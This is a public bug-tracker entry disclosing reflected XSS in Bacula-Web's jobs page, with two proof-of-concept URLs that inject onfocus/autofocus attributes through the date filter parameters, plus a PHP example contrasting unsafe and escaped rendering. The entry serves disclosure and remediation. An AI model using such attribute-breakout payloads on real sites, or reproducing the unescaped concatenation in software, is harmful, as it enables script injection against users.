View Issue Details

ID: 0000236
Project: Bacula-Web
Category: security-issue
View Status: public
Last Update: 2018-03-03 21:20
Reporter: gsorondo
Assigned To: davide
Priority: high
Severity: major
Reproducibility: always
Status: resolved
Resolution: fixed
Product Version: 8.0.0-rc1
Target Version: 8.0.0-rc2
Fixed in Version: 8.0.0-rc2
Summary: 0000236: XSS vulnerabilities in jobs page
Description: Just found these while scanning:

Accessing these URLs within a non-protected browser (e.g. Firefox) will display an alert(1). In Chrome they will get blocked by the XSS Auditor.

http://hostname/index.php?page=jobs&job_status_filter=0&job_levelid_filter=0&job_type_filter=0&job_clientid_filter=0&jobs_poolid_filter=0&job_starttime_filter=2017-01-30+13%3A45%3A16&job_endtime_filter=2018-02-26%2013%3a45%3a22jdbwg%22onfocus%3d%22alert(1)%22autofocus%3d%22s1oare5nds0&job_orderby=jobid&jobs_per_page=25

http://hostname/index.php?page=jobs&job_status_filter=0&job_levelid_filter=0&job_type_filter=0&job_clientid_filter=0&jobs_poolid_filter=0&job_starttime_filter=2017-01-30%2013%3a45%3a16mkij9%22onfocus%3d%22alert(1)%22autofocus%3d%22a7g8zvz9h0j&job_endtime_filter=2018-02-26+13%3A45%3A22&job_orderby=jobid&jobs_per_page=25
Tags: No tags attached.
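The reflection the report describes, as an added example that is not Bacula-Web's code: the date filter value echoed unescaped into an input attribute, beside the same rendering with validation and HTML escaping. Function names and the fallback parameter are assumptions.

```php
<?php
// Added example (not Bacula-Web's own code). The job filter values from the
// query string end up in <input value="..."> attributes. The first function
// reproduces the unsafe pattern; the second checks the filter against the
// expected "YYYY-MM-DD HH:MM:SS" shape and escapes it before it reaches the
// attribute. Function names are hypothetical.

declare(strict_types=1);

// Constructed samples: a well-formed filter and the URL-decoded
// job_endtime_filter value from the report, which carries the breakout.
$benign  = '2018-02-26 13:45:22';
$hostile = '2018-02-26 13:45:22jdbwg"onfocus="alert(1)"autofocus="s1oare5nds0';

// Vulnerable: the raw parameter is concatenated straight into the attribute,
// so a double quote in the value closes it and extra attributes are injected.
function renderEndtimeUnsafe(string $value): string
{
    return '<input type="text" name="job_endtime_filter" value="' . $value . '">';
}

// Hardened, step 1: reject anything that is not a plausible timestamp.
function sanitizeDatetimeFilter(?string $value, string $fallback): string
{
    if ($value === null) {
        return $fallback;
    }
    $ok = preg_match('/^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}$/', $value) === 1;
    return $ok ? $value : $fallback;
}

// Hardened, step 2: escape with ENT_QUOTES so neither " nor ' can terminate
// the attribute even if validation is loosened later.
function renderEndtimeSafe(?string $value, string $fallback = ''): string
{
    $clean = sanitizeDatetimeFilter($value, $fallback);
    $attr  = htmlspecialchars($clean, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="job_endtime_filter" value="' . $attr . '">';
}

// Compare the two renderings of the hostile input; only the unsafe one
// yields an element with onfocus/autofocus attributes.
echo renderEndtimeUnsafe($hostile), PHP_EOL;
echo renderEndtimeSafe($hostile), PHP_EOL;
echo renderEndtimeSafe($benign), PHP_EOL;
```

In the real page the value would come from `$_GET['job_endtime_filter']`, which PHP has already URL-decoded, so both the `+` and the `%20` forms in the report reach the attribute as the same string.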

Activities

davide (manager), 2018-02-28 09:52, note ~0000727

Bug fixes will be available in 8.0.0-rc2

Issue History

Date Modified Username Field Change
2018-02-27 10:42 davide New Issue
2018-02-27 10:42 davide Status new => assigned
2018-02-27 10:42 davide Assigned To => davide
2018-02-27 10:43 davide Reporter davide => gsorondo
2018-02-28 09:52 davide Status assigned => resolved
2018-02-28 09:52 davide Resolution open => fixed
2018-02-28 09:52 davide Fixed in Version => 8.0.0-rc2
2018-02-28 09:52 davide Note Added: 0000727
2018-03-03 21:20 davide View Status private => public